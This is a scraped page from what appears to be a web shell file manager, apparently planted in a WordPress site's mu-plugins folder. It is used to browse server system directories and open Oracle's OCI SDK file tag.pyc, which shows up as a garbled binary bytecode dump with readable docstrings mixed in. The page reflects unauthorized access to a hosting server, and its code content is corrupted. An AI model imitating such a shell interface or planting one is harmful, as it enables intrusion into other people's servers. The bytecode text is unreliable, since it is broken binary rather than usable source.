📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
identity
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/identity/models
💾
Free:
45.6 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: tag.pyc
a O��f<? � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdd� Ze dd � �Z e jd d � �Z e dd� �Zejd d� �Ze dd� �Z e jdd� �Z e dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze dd� �Zejdd� �Ze d d!� �Zejd"d!� �Ze d#d$� �Zejd%d$� �Ze d&d'� �Zejd(d'� �Ze d)d*� �Zejd+d*� �Ze d,d-� �Zejd.d-� �Zd/d0� Zd1d2� Zd3d4� Zd5S )6�Taga� A tag definition that belongs to a specific tag namespace. "Defined tags" must be set up in your tenancy before you can apply them to resources. For more information, see `Managing Tags and Tag Namespaces`__. **Warning:** Oracle recommends that you avoid using any confidential information when you supply string values using the API. __ https://docs.cloud.oracle.com/Content/Identity/Concepts/taggingoverview.htm �ACTIVE�INACTIVE�DELETING�DELETEDc K s� dddddddddddddd� | _ dd d ddd dddddddd� | _d| _d| _d| _d| _d| _d| _d| _d| _ d| _ d| _d| _d| _ d| _dS )a� Initializes a new Tag object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param compartment_id: The value to assign to the compartment_id property of this Tag. :type compartment_id: str :param tag_namespace_id: The value to assign to the tag_namespace_id property of this Tag. :type tag_namespace_id: str :param tag_namespace_name: The value to assign to the tag_namespace_name property of this Tag. :type tag_namespace_name: str :param id: The value to assign to the id property of this Tag. :type id: str :param name: The value to assign to the name property of this Tag. :type name: str :param description: The value to assign to the description property of this Tag. :type description: str :param freeform_tags: The value to assign to the freeform_tags property of this Tag. :type freeform_tags: dict(str, str) :param defined_tags: The value to assign to the defined_tags property of this Tag. :type defined_tags: dict(str, dict(str, object)) :param is_retired: The value to assign to the is_retired property of this Tag. :type is_retired: bool :param lifecycle_state: The value to assign to the lifecycle_state property of this Tag. Allowed values for this property are: "ACTIVE", "INACTIVE", "DELETING", "DELETED", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type lifecycle_state: str :param time_created: The value to assign to the time_created property of this Tag. :type time_created: datetime :param is_cost_tracking: The value to assign to the is_cost_tracking property of this Tag. :type is_cost_tracking: bool :param validator: The value to assign to the validator property of this Tag. :type validator: oci.identity.models.BaseTagDefinitionValidator �strzdict(str, str)zdict(str, dict(str, object))�bool�datetime�BaseTagDefinitionValidator) �compartment_id�tag_namespace_id�tag_namespace_name�id�name�description� freeform_tags�defined_tags� is_retired�lifecycle_state�time_created�is_cost_tracking� validator� compartmentId�tagNamespaceId�tagNamespaceNamer r r �freeformTags�definedTags� isRetired�lifecycleState�timeCreated�isCostTrackingr N)� swagger_types� attribute_map�_compartment_id�_tag_namespace_id�_tag_namespace_name�_id�_name�_description�_freeform_tags� _defined_tags�_is_retired�_lifecycle_state� _time_created�_is_cost_tracking� _validator)�self�kwargs� r6 �{/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/identity/models/tag.py�__init__'